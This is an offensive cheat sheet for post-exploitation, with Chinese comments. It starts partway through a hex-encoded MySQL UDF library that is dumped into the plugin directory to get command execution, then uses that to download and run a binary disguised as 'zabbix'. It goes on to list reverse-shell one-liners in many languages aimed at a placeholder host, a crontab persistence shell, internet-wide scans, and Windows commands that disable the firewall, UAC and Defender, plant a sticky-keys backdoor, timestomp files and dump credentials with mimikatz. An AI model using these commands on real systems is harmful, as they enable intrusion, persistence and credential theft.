000000000000000000CD00000012000000000000000000000000000000000000001E0100001200000000000000000000000000000000000000620100001200000000000000000000000000000000000000E30000001200000000000000000000000000000000000000B90000001200000000000000000000000000000000000000680100001200000000000000000000000000000000000000160000002200000000000000000000000000000000000000540000001200000000000000000000000000000000000000F00000001200000000000000000000000000000000000000B200000012000000000000000000000000000000000000005A01000012000000000000000000000000000000000000005201000012000000000000000000000000000000000000004C0100001200000000000000000000000000000000000000E800000012000B00D10D000000000000D1000000000000003301000012000B00A90F0000000000000A000000000000001000000012000C00481100000000000000000000000000007800000012000B009F0B0000000000004C00000000000000FF0000001200090088090000000000000000000000000000800100001000F1FF101720000000000000000000000000001501000012000B00130F0000000000002F000000000000008C0100001000F1FF201720000000000000000000000000009B00000012000B00480C0000000000000A000000000000002501000012000B00420F0000000000006700000000000000AA00000012000B00520C00000000000063000000000000005B00000012000B00950B0000000000000A000000000000008E00000012000B00EB0B0000000000005D00000000000000790100001000F1FF101720000000000000000000000000000501000012000B00090F0000000000000A00000000000000C000000012000B00B50C000000000000F100000000000000F700000012000B00A20E00000000000067000000000000003900000012000B004C0B0000000000004900000000000000D400000012000B00A60D0000000000002B000000000000004301000012000B00B30F0000000000005501000000000000005F5F676D6F6E5F73746172745F5F005F66696E69005F5F6378615F66696E616C697A65005F4A765F5265676973746572436C6173736573006C69625F6D7973716C7564665F7379735F696E666F5F696E6974006D656D637079006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F007379735F6765745F696E6974007379735F6765745F6465696E6974007379735F67657400676574656E76007374726C656E007379735F7365745F696E6974006D616C6C6F63007379735F7365745F6465696E69740066726565007379735F73657400736574656E76007379735F657865635F696E6974007379735F657865635F6465696E6974007379735F657865630073797374656D007379735F6576616C5F696E6974007379735F6576616C5F6465696E6974007379735F6576616C00706F70656E007265616C6C6F63007374726E6370790066676574730070636C6F7365006C6962632E736F2E36005F6564617461005F5F6273735F7374617274005F656E6400474C4942435F322E322E3500000000000000000000020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001006F0100001000000000000000751A6909000002009101000000000000F0142000000000000800000000000000F0142000000000007816200000000000060000000200000000000000000000008016200000000000060000000300000000000000000000008816200000000000060000000A0000000000000000000000A81620000000000007000000040000000000000000000000B01620000000000007000000050000000000000000000000B81620000000000007000000060000000000000000000000C01620000000000007000000070000000000000000000000C81620000000000007000000080000000000000000000000D01620000000000007000000090000000000000000000000D816200000000000070000000A0000000000000000000000E016200000000000070000000B0000000000000000000000E816200000000000070000000C0000000000000000000000F016200000000000070000000D0000000000000000000000F816200000000000070000000E00000000000000000000000017200000000000070000000F00000000000000000000000817200000000000070000001000000000000000000000004883EC08E8EF000000E88A010000E8750700004883C408C3FF35F20C2000FF25F40C20000F1F4000FF25F20C20006800000000E9E0FFFFFFFF25EA0C20006801000000E9D0FFFFFFFF25E20C20006802000000E9C0FFFFFFFF25DA0C20006803000000E9B0FFFFFFFF25D20C20006804000000E9A0FFFFFFFF25CA0C20006805000000E990FFFFFFFF25C20C20006806000000E980FFFFFFFF25BA0C20006807000000E970FFFFFFFF25B20C20006808000000E960FFFFFFFF25AA0C20006809000000E950FFFFFFFF25A20C2000680A000000E940FFFFFFFF259A0C2000680B000000E930FFFFFFFF25920C2000680C000000E920FFFFFF4883EC08488B05ED0B20004885C07402FFD04883C408C390909090909090909055803D680C2000004889E5415453756248833DD00B200000740C488D3D2F0A2000E84AFFFFFF488D1D130A20004C8D25040A2000488B053D0C20004C29E348C1FB034883EB014839D873200F1F4400004883C0014889051D0C200041FF14C4488B05120C20004839D872E5C605FE0B2000015B415CC9C3660F1F84000000000048833DC009200000554889E5741A488B054B0B20004885C0740E488D3DA7092000C9FFE00F1F4000C9C39090554889E54883EC3048897DE8488975E0488955D8488B45E08B0085C07421488D0DE7050000488B45D8BA320000004889CE4889C7E89BFEFFFFC645FF01EB04C645FF000FB645FFC9C3554889E548897DF8C9C3554889E54883EC3048897DF8488975F0488955E848894DE04C8945D84C894DD0488D0DCA050000488B45E8BA1F0000004889CE4889C7E846FEFFFF488B45E048C7001E000000488B45E8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F801751C488B45F0488B40088B0085C0750E488B45F8C60001B800000000EB20488D0D83050000488B45E8BA2B0000004889CE4889C7E8DFFDFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC4048897DE8488975E0488955D848894DD04C8945C84C894DC0488B45E0488B4010488B004889C7E8BBFDFFFF488945F848837DF8007509488B45C8C60001EB16488B45F84889C7E84BFDFFFF4889C2488B45D0488910488B45F8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F8027425488D0D05050000488B45E8BA1F0000004889CE4889C7E831FDFFFFB801000000E9AB000000488B45F0488B40088B0085C07422488D0DF2040000488B45E8BA280000004889CE4889C7E8FEFCFFFFB801000000EB7B488B45F0488B40084883C004C70000000000488B45F0488B4018488B10488B45F0488B40184883C008488B00488D04024883C0024889C7E84BFCFFFF4889C2488B45F848895010488B45F8488B40104885C07522488D0DA4040000488B45E8BA1A0000004889CE4889C7E888FCFFFFB801000000EB05B800000000C9C3554889E54883EC1048897DF8488B45F8488B40104885C07410488B45F8488B40104889C7E811FCFFFFC9C3554889E54883EC3048897DE8488975E0488955D848894DD0488B45E8488B4010488945F0488B45E0488B4018488B004883C001480345F0488945F8488B45E0488B4018488B10488B45E0488B4010488B08488B45F04889CE4889C7E8EFFBFFFF488B45E0488B4018488B00480345F0C60000488B45E0488B40184883C008488B10488B45E0488B40104883C008488B08488B45F84889CE4889C7E8B0FBFFFF488B45E0488B40184883C008488B00480345F8C60000488B4DF8488B45F0BA010000004889CE4889C7E892FBFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0DC2020000488B45D8BA2B0000004889CE4889C7E81EFBFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC2048897DF8488975F0488955E848894DE0488B45F0488B4010488B004889C7E882FAFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0D22020000488B45D8BA2B0000004889CE4889C7E87EFAFFFFB801000000C9C3554889E548897DF8C9C3554889E54881EC500400004889BDD8FBFFFF4889B5D0FBFFFF488995C8FBFFFF48898DC0FBFFFF4C8985B8FBFFFF4C898DB0FBFFFFBF01000000E8BEF9FFFF488985C8FBFFFF48C745F000000000488B85D0FBFFFF488B4010488B00488D352C0200004889C7E852FAFFFF488945E8EB63488D85E0FBFFFF4889C7E8BDF9FFFF488945F8488B45F8488B55F04801C2488B85C8FBFFFF4889D64889C7E80CFAFFFF488985C8FBFFFF488D85E0FBFFFF488B55F0488B8DC8FBFFFF4801D1488B55F84889C64889CFE8D1F9FFFF488B45F8480145F0488B55E8488D85E0FBFFFFBE000400004889C7E831F9FFFF4885C07580488B45E84889C7E850F9FFFF488B85C8FBFFFF0FB60084C0740A4883BDC8FBFFFF00750C488B85B8FBFFFFC60001EB2B488B45F0488B95C8FBFFFF488D0402C60000488B85C8FBFFFF4889C7E8FBF8FFFF488B95C0FBFFFF488902488B85C8FBFFFFC9C39090909090909090554889E5534883EC08488B05A80320004883F8FF7419488D1D9B0320000F1F004883EB08FFD0488B034883F8FF75F14883C4085BC9C390904883EC08E84FF9FFFF4883C408C300004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279007200011B033B800000000F00000008F9FFFF9C00000051F9FFFFBC0000005BF9FFFFDC000000A7F9FFFFFC00000004FAFFFF1C0100000EFAFFFF3C01000071FAFFFF5C01000062FBFFFF7C0100008DFBFFFF9C0100005EFCFFFFBC010000C5FCFFFFDC010000CFFCFFFFFC010000FEFCFFFF1C02000065FDFFFF3C0200006FFDFFFF5C0200001400000000000000017A5200017810011B0C0708900100001C0000001C00000064F8FFFF4900000000410E108602430D0602440C070800001C0000003C0000008DF8FFFF0A00000000410E108602430D06450C07080000001C0000005C00000077F8FFFF4C00000000410E108602430D0602470C070800001C0000007C000000A3F8FFFF5D00000000410E108602430D0602580C070800001C0000009C000000E0F8FFFF0A00000000410E108602430D06450C07080000001C000000BC000000CAF8FFFF6300000000410E108602430D06025E0C070800001C000000DC0000000DF9FFFFF100000000410E108602430D0602EC0C070800001C000000FC000000DEF9FFFF2B00000000410E108602430D06660C07080000001C0000001C010000E9F9FFFFD100000000410E108602430D0602CC0C070800001C0000003C0100009AFAFFFF6700000000410E108602430D0602620C070800001C0000005C010000E1FAFFFF0A00000000410E108602430D06450C07080000001C0000007C010000CBFAFFFF2F00000000410E108602430D066A0C07080000001C0000009C010000DAFAFFFF6700000000410E108602430D0602620C070800001C000000BC01000021FBFFFF0A00000000410E108602430D06450C07080000001C000000DC0100000BFBFFFF5501000000410E108602430D060350010C0708000000000000000000FFFFFFFFFFFFFFFF0000000000000000FFFFFFFFFFFFFFFF00000000000000000000000000000000F01420000000000001000000000000006F010000000000000C0000000000000088090000000000000D000000000000004811000000000000F5FEFF6F00000000B8010000000000000500000000000000E805000000000000060000000000000070020000000000000A000000000000009D010000000000000B000000000000001800000000000000030000000000000090162000000000000200000000000000380100000000000014000000000000000700000000000000170000000000000050080000000000000700000000000000F0070000000000000800000000000000600000000000000009000000000000001800000000000000FEFFFF6F00000000D007000000000000FFFFFF6F000000000100000000000000F0FFFF6F000000008607000000000000F9FFFF6F0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F81420000000000000000000000000000000000000000000B609000000000000C609000000000000D609000000000000E609000000000000F609000000000000060A000000000000160A000000000000260A000000000000360A000000000000460A000000000000560A000000000000660A000000000000760A0000000000004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D3429004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D31372900002E73796D746162002E737472746162002E7368737472746162002E6E6F74652E676E752E6275696C642D6964002E676E752E68617368002E64796E73796D002E64796E737472002E676E752E76657273696F6E002E676E752E76657273696F6E5F72002E72656C612E64796E002E72656C612E706C74002E696E6974002E74657874002E66696E69002E726F64617461002E65685F6672616D655F686472002E65685F6672616D65002E63746F7273002E64746F7273002E6A6372002E646174612E72656C2E726F002E64796E616D6963002E676F74002E676F742E706C74002E627373002E636F6D6D656E7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001B0000000700000002000000000000009001000000000000900100000000000024000000000000000000000000000000040000000000000000000000000000002E000000F6FFFF6F0200000000000000B801000000000000B801000000000000B400000000000000030000000000000008000000000000000000000000000000380000000B000000020000000000000070020000000000007002000000000000780300000000000004000000020000000800000000000000180000000000000040000000030000000200000000000000E805000000000000E8050000000000009D0100000000000000000000000000000100000000000000000000000000000048000000FFFFFF6F0200000000000000860700000000000086070000000000004A0000000000000003000000000000000200000000000000020000000000000055000000FEFFFF6F0200000000000000D007000000000000D007000000000000200000000000000004000000010000000800000000000000000000000000000064000000040000000200000000000000F007000000000000F00700000000000060000000000000000300000000000000080000000000000018000000000000006E000000040000000200000000000000500800000000000050080000000000003801000000000000030000000A000000080000000000000018000000000000007800000001000000060000000000000088090000000000008809000000000000180000000000000000000000000000000400000000000000000000000000000073000000010000000600000000000000A009000000000000A009000000000000E0000000000000000000000000000000040000000000000010000000000000007E000000010000000600000000000000800A000000000000800A000000000000C80600000000000000000000000000001000000000000000000000000000000084000000010000000600000000000000481100000000000048110000000000000E000000000000000000000000000000040000000000000000000000000000008A00000001000000020000000000000058110000000000005811000000000000EC0000000000000000000000000000000800000000000000000000000000000092000000010000000200000000000000441200000000000044120000000000008400000000000000000000000000000004000000000000000000000000000000A0000000010000000200000000000000C812000000000000C812000000000000FC01000000000000000000000000000008000000000000000000000000000000AA000000010000000300000000000000C814200000000000C8140000000000001000000000000000000000000000000008000000000000000000000000000000B1000000010000000300000000000000D814200000000000D8140000000000001000000000000000000000000000000008000000000000000000000000000000B8000000010000000300000000000000E814200000000000E8140000000000000800000000000000000000000000000008000000000000000000000000000000BD000000010000000300000000000000F014200000000000F0140000000000000800000000000000000000000000000008000000000000000000000000000000CA000000060000000300000000000000F814200000000000F8140000000000008001000000000000040000000000000008000000000000001000000000000000D3000000010000000300000000000000781620000000000078160000000000001800000000000000000000000000000008000000000000000800000000000000D8000000010000000300000000000000901620000000000090160000000000008000000000000000000000000000000008000000000000000800000000000000E1000000080000000300000000000000101720000000000010170000000000001000000000000000000000000000000008000000000000000000000000000000E60000000100000030000000000000000000000000000000101700000000000059000000000000000000000000000000010000000000000001000000000000001100000003000000000000000000000000000000000000006917000000000000EF00000000000000000000000000000001000000000000000000000000000000010000000200000000000000000000000000000000000000581F00000000000068070000000000001B0000002C00000008000000000000001800000000000000090000000300000000000000000000000000000000000000C02600000000000042030000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000100900100000000000000000000000000000000000003000200B80100000000000000000000000000000000000003000300700200000000000000000000000000000000000003000400E80500000000000000000000000000000000000003000500860700000000000000000000000000000000000003000600D00700000000000000000000000000000000000003000700F00700000000000000000000000000000000000003000800500800000000000000000000000000000000000003000900880900000000000000000000000000000000000003000A00A00900000000000000000000000000000000000003000B00800A00000000000000000000000000000000000003000C00481100000000000000000000000000000000000003000D00581100000000000000000000000000000000000003000E00441200000000000000000000000000000000000003000F00C81200000000000000000000000000000000000003001000C81420000000000000000000000000000000000003001100D81420000000000000000000000000000000000003001200E81420000000000000000000000000000000000003001300F01420000000000000000000000000000000000003001400F81420000000000000000000000000000000000003001500781620000000000000000000000000000000000003001600901620000000000000000000000000000000000003001700101720000000000000000000000000000000000003001800000000000000000000000000000000000100000002000B00800A0000000000000000000000000000110000000400F1FF000000000000000000000000000000001C00000001001000C81420000000000000000000000000002A00000001001100D81420000000000000000000000000003800000001001200E81420000000000000000000000000004500000002000B00A00A00000000000000000000000000005B00000001001700101720000000000001000000000000006A00000001001700181720000000000008000000000000007800000002000B00200B0000000000000000000000000000110000000400F1FF000000000000000000000000000000008400000001001000D01420000000000000000000000000009100000001000F00C01400000000000000000000000000009F00000001001200E8142000000000000000000000000000AB00000002000B0010110000000000000000000000000000C10000000400F1FF00000000000000000000000000000000D40000000100F1FF90162000000000000000000000000000EA00000001001300F0142000000000000000000000000000F700000001001100E0142000000000000000000000000000040100000100F1FFF81420000000000000000000000000000D01000012000B00D10D000000000000D1000000000000001501000012000B00130F0000000000002F000000000000001E01000020000000000000000000000000000000000000002D01000020000000000000000000000000000000000000004101000012000C00481100000000000000000000000000004701000012000B00A90F0000000000000A000000000000005701000012000000000000000000000000000000000000006B01000012000000000000000000000000000000000000007F01000012000B00A20E00000000000067000000000000008D01000012000B00B30F0000000000005501000000000000960100001200000000000000000000000000000000000000A901000012000B00950B0000000000000A00000000000000C601000012000B00B50C000000000000F100000000000000D30100001200000000000000000000000000000000000000E50100001200000000000000000000000000000000000000F901000012000000000000000000000000000000000000000D02000012000B004C0B00000000000049000000000000002802000022000000000000000000000000000000000000004402000012000B00A60D0000000000002B000000000000005302000012000B00EB0B0000000000005D000000000000006002000012000B00480C0000000000000A000000000000006F02000012000000000000000000000000000000000000008302000012000B00420F0000000000006700000000000000910200001200000000000000000000000000000000000000A50200001200000000000000000000000000000000000000B902000012000B00520C0000000000006300000000000000C10200001000F1FF10172000000000000000000000000000CD02000012000B009F0B0000000000004C00000000000000E30200001000F1FF20172000000000000000000000000000E80200001200000000000000000000000000000000000000FD02000012000B00090F0000000000000A000000000000000D0300001200000000000000000000000000000000000000220300001000F1FF101720000000000000000000000000002903000012000000000000000000000000000000000000003C03000012000900880900000000000000000000000000000063616C6C5F676D6F6E5F73746172740063727473747566662E63005F5F43544F525F4C4953545F5F005F5F44544F525F4C4953545F5F005F5F4A43525F4C4953545F5F005F5F646F5F676C6F62616C5F64746F72735F61757800636F6D706C657465642E363335320064746F725F6964782E36333534006672616D655F64756D6D79005F5F43544F525F454E445F5F005F5F4652414D455F454E445F5F005F5F4A43525F454E445F5F005F5F646F5F676C6F62616C5F63746F72735F617578006C69625F6D7973716C7564665F7379732E63005F474C4F42414C5F4F46465345545F5441424C455F005F5F64736F5F68616E646C65005F5F44544F525F454E445F5F005F44594E414D4943007379735F736574007379735F65786563005F5F676D6F6E5F73746172745F5F005F4A765F5265676973746572436C6173736573005F66696E69007379735F6576616C5F6465696E6974006D616C6C6F634040474C4942435F322E322E350073797374656D4040474C4942435F322E322E35007379735F657865635F696E6974007379735F6576616C0066676574734040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974007379735F7365745F696E697400667265654040474C4942435F322E322E35007374726C656E4040474C4942435F322E322E350070636C6F73654040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F696E6974005F5F6378615F66696E616C697A654040474C4942435F322E322E35007379735F7365745F6465696E6974007379735F6765745F696E6974007379735F6765745F6465696E6974006D656D6370794040474C4942435F322E322E35007379735F6576616C5F696E697400736574656E764040474C4942435F322E322E3500676574656E764040474C4942435F322E322E35007379735F676574005F5F6273735F7374617274006C69625F6D7973716C7564665F7379735F696E666F005F656E64007374726E6370794040474C4942435F322E322E35007379735F657865635F6465696E6974007265616C6C6F634040474C4942435F322E322E35005F656461746100706F70656E4040474C4942435F322E322E35005F696E697400') into dumpfile '/usr/lib64/mysql/plugin/mysqludf.so';
Query OK, 1 row affected (0.01 sec)#需要有/usr/lib64/mysql/plugin/目录的写入权限

mysql> create function sys_eval returns string soname 'mysqludf.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| mysql
             |
+--------------------+
1 row in set (0.03 sec)

mysql> select * from func;
+----------+-----+-------------+----------+
| name     | ret | dl          | type     |
+----------+-----+-------------+----------+
| sys_eval |   0 | mysqludf.so | function |
+----------+-----+-------------+----------+
1 row in set (0.00 sec)

mysql> select sys_eval('cd /tmp;wget http://x.x.x.x/xxx.exe;chmod +x xxx.exe;mv xxx.exe zabbix;./zabbix');
+--------------------------------------------------------------------------------------------------------------+
| sys_eval('cd /tmp;wget http://x.x.x.x/xxx.exe;chmod +x xxx.exe;mv xxx.exe zabbix;./zabbix') |
+--------------------------------------------------------------------------------------------------------------+
|                                                                                                              |
+--------------------------------------------------------------------------------------------------------------+
1 row in set

mysql> drop function sys_eval;
Query OK, 0 rows affected (0.00 sec)

mysql> select * from func;
Empty set (0.00 sec)

BASH REVERSE SHELL|bash -i >& /dev/tcp/x.x.x.x/1337 0>&1
BASH REVERSE SHELL|0<&196;exec 196<>/dev/tcp/x.x.x.x/1337; sh <&196 >&196 2>&196
PERL REVERSE SHELL|perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:1337");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
PERL REVERSE SHELL WINDOWS|perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:1337");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
RUBY REVERSE SHELL|ruby -rsocket -e 'exit if fork;c=TCPSocket.new("x.x.x.x","1337");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
RUBY REVERSE SHELL|ruby -rsocket -e'f=TCPSocket.open("x.x.x.x",1337).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
RUBY REVERSE SHELL WINDOWS|ruby -rsocket -e 'c=TCPSocket.new("x.x.x.x","1337");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
NETCAT REVERSE SHELL|nc -c /bin/sh x.x.x.x 1337
NETCAT REVERSE SHELL|/bin/sh | nc x.x.x.x 1337
NETCAT REVERSE SHELL|rm -f /tmp/p; mknod /tmp/p p && nc x.x.x.x 1337 0/tmp/p
PYTHON REVERSE SHELL|python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP REVERSE SHELL|php -r '$sock=fsockopen("x.x.x.x",1337);exec("/bin/sh -i <&3 >&3 2>&3");'
TELNET REVERSE SHELL|rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 1337 0/tmp/p
POWERSHELL REVERSE SHELL|powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("x.x.x.x",1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

openssl s_server -quiet -key key.pem -cert cert.pem -port 1337	//本地监听
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect x.x.x.x:1337 > /tmp/s; rm /tmp/s	//启动反弹shell

(crontab -l;printf "* * * * *  /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"x.x.x.x\",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n")|crontab -

/bin/sh -i
perl -e 'exec "/bin/sh";'
python -c 'import pty; pty.spawn("/bin/bash")' 

#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444
#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444  

A类：10.0.0.0/8	即10.0.0.0-10.255.255.255

B类：172.16.0.0/12 即172.16.0.1-172.31.255.254

C类：192.168.0.0/16 即192.168.0.1-192.168.255.254

nmap -v -sn -PE -n --min-hostgroup 1024 --min-parallelism 1024 -oN 10.txt 10.0.0.0/8 > /dev/null 2>&1
nmap -v -sn -PE -n --min-hostgroup 1024 --min-parallelism 1024 -oN 172.txt 172.16.0.0/12 > /dev/null 2>&1
nmap -v -sn -PE -n --min-hostgroup 1024 --min-parallelism 1024 -oN 192.txt 192.168.0.0/16 > /dev/null 2>&1
或
fping -a -g 10.0.0.0/8 >10.txt
fping -a -g 172.16.0.0/12 >172.txt
fping -a -g 192.168.0.0/16 >192.txt
或
masscan 10.0.0.0/8,172.16.0.0/12,192.168.0.0/16 --ping --max-rate 100000 >all.txt
masscan 0.0.0.0/0 -p443,8443 --max-rate 100000 --heartbleed >443.txt	//心脏滴血漏洞扫描
masscan -p80 0.0.0.0/0 --exclude 10.0.0.0/8,172.16.0.0/12,192.168.0.0/16 --max-rate 300000 >all.txt	//扫描全网80端口ip段，排除内网ip段(或机房ip段)
或
masscan -p80 0.0.0.0/0 --excludefile blackip.txt --max-rate 300000 >all.txt	//扫描全网80端口ip段，blackip.txt填写排除ip地址或ip段每行一个

21,22,53,80-89,161,389,443,445,873,1080,1098,1099,1352,1443,1194,1723,1433,1521,2049,2222,2376,3000,3306,3389,3690,4848,4899,5000,5432,5900,5984,6379,7001,7002,8000,8001,8291,8443,8080-8089,8161,8808,8888,8899,9080,9090,9200,9300,9999,10443,27017,27018,50000

find / -name id_rsa	//查找私钥
ssh -i id_rsa user@xxx	//公钥免密登录

type  *.txt  > all.txt	//多个txt文件合并
net user test 1234 /add	//添加新用户
net localgroup administrators test /add	//添加新用户到管理员组
taskkill /F /IM "cmd.exe"	//按名称杀死进程
taskkill /pid xxx -t -f	//强制结束pid进程和子进程
wmic process get name,executablepath,processid  //查看任务管理器名称，路径，pid
shutdown /r /t 0	//立即重启
shutdown /s /t 0	//立即关机
fsutil fsinfo drives	//查找系统上的所有硬盘/存储分区
netsh firewall set opmode disable	//关闭Windows防火墙
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f	//将管理员的UAC行为设置为"不提示"
netsh Advfirewall set allprofiles state off	//关闭防火墙
netsh Advfirewall set allprofiles state on	//开启防火墙
netsh Advfirewall show allprofiles	//检查防火墙状态
netsh -c interface dump	//将当前网络配置导出查看
sc query | more	//检查系统所有服务
sc stop cc_cometDaemon.exe	//停止服务
sc start cc_cometDaemon.exe	//开启服务
sc query cc_cometDaemon.exe	//检查停止状态
sc config cc_cometDaemon.exe start=disabled	//禁用服务
sc config cc_cometDaemon.exe start=auto	//服务自启动
wmic process where Name="xxx.exe" get ProcessId,name,commandline	//查询某进程信息.进程id、进程名、执行命令 
powershell.exe -command "ls '%cd%\*.*' | foreach-object { $_.LastWriteTime = '01/01/2021 01:01:01'; $_.CreationTime = '02/02/2021 01:01:01'; $_.LastAccessTime = '03/03/2021 01:01:01' }" //windows 命令行修改文件时间戳
C:/WINNT/system32/inetsrv/MetaBase.bin	//IIS 5 中，IIS 的配置文件
C:/WINDOWS/system32/inetsrv/MetaBase.xml	//IIS 6 中，IIS 的配置文件
C:/WINDOWS/system32/inetstr/config/applicationHost.config	//IIS 7 中，IIS 的配置文件
或
iis6:type  %systemroot%\system32\inetsrv\metabase.xml|findstr Path=
iis7/8:type %systemroot%\System32\inetsrv\config\applicationHost.config|findstr physicalPath=
iis7/8:  %windir%\system32\inetsrv\appcmd list site	//查看网站列表
iis7/8:  %windir%\system32\inetsrv\appcmd list sites /state:started	//列出开始的站点
iis7/8:  %windir%\system32\inetsrv\appcmd list sites /state:stopped	//列出停止的站点
type c:\windows\system32\drivers\etc\hosts	//查看hosts文件
netsh firewall set icmpsetting 8	//开启外部ping
netsh firewall set icmpsetting 8 disable	//禁止外部Ping
ipconfig /displaydns	//查看本地DNS缓存
wmic OS get Caption, CSDVersion, OSArchitecture, Version	//获取系统版本信息
wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct get /format:LIST	//查找系统安装的杀毒软件
wmic product get name,version	//查看当前安装的程序
net config workstation	//查看当前登陆域
cmdkey /list	//获取远程桌面连接过的历史账户列表
attrib +h "your_folder_or_file"	//隐藏文件夹或文件
attrib +h "d:\demo\*" /s /d
dir /a:h	//列出隐藏文件
attrib -s -h "your_hidden_folder_or_file"	//取消隐藏文件夹或文件
PowerShell Compress-Archive . filename.zip  //压缩当前目录为zip
PowerShell Expand-Archive filename.zip .  //解压zip
REG add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /d 1 /t REG_DWORD /f	//关闭 Windows Defender 杀毒
REG add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /d 0 /t REG_DWORD /f	//开启 Windows Defender 杀毒
REG add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1	//将regedit值设置为1并启动wdigest auth抓取明文密码
REG query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential	//查询是否启用wdigest auth抓取明文密码
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /v "c:\windows\system32\cmd.exe" /d "RUNASADMIN" /f	//以管理员权限执行命令
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /v "c:\windows\system32\cmd.exe" /f	//删除以管理员权限执行命令
mstsc /admin /v:192.168.58.129	//突破终端服务器已超过允许的最大连接数
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f	//启用RDP访问3389
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber //十六进制转十进制，查看rdp端口
或
tasklist /svc |find "TermService" //查看系统进程TermService服务对应的PID
netstat -ano | findstr pid	//查找TermService服务PID对应的端口
或
for /f "tokens=2 delims=x" %a in ('reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" ^| find "PortNumber"') do (set /a n=0x%a)
REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fSingleSessionPerUser /t REG_DWORD /d 0 /f	//设置单用户允许多个RDP会话
REG query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fSingleSessionPerUser	//查看是否开单用户允许多个RDP会话
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f	//sethc粘键后门后门
ntsd -cq -pn SafeDogGuardCenter.exe	//搞死安全狗3.x
for /r c:\ %i in (Newslist*.aspx) do @echo %i	//在WINDOWS下命令查找文件

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonPasswords full" exit	//获取密码
